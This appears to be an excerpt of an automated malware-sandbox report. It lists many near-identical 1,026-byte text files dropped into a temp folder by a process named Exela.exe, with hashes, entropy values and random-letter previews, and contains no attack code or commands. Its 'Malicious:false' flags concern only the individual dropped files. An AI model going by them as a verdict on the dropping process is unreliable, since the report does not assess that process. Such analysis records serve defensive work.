                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
                                                                                                  Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701796197804446
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                  MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                  SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                  SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                  SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                  Malicious:false
                                                                                                  Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.696835919052288
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                  MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                  SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                  SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                  SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.694142261581685
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                  MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                  SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                  SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                  SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.691266297898928
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                  MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                  SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                  SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                  SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.701111373123985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
                                                                                                  MD5:CA5A3E2A0C2DDF92EABE165672425976
                                                                                                  SHA1:1933AC1A510945A766039E7E61D7DA4156E0F074
                                                                                                  SHA-256:4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
                                                                                                  SHA-512:64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
                                                                                                  Malicious:false
                                                                                                  Preview:BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.702862417860716
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
                                                                                                  MD5:CC0686FCDF6617729D1EDF30F49501F1
                                                                                                  SHA1:02D629848E3D467D8143B057F003E0D7448126CD
                                                                                                  SHA-256:31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
                                                                                                  SHA-512:8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
                                                                                                  Malicious:false
                                                                                                  Preview:DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698711683401115
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                  MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                  SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                  SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                  SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.698393795110914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                  MD5:7C5655873C22D2522B13B34841F82038
                                                                                                  SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                  SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                  SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                  Malicious:false
                                                                                                  Preview:
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1026
                                                                                                  Entropy (8bit):4.69486718145169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                  MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                  SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                  SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                  SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                  Malicious:false
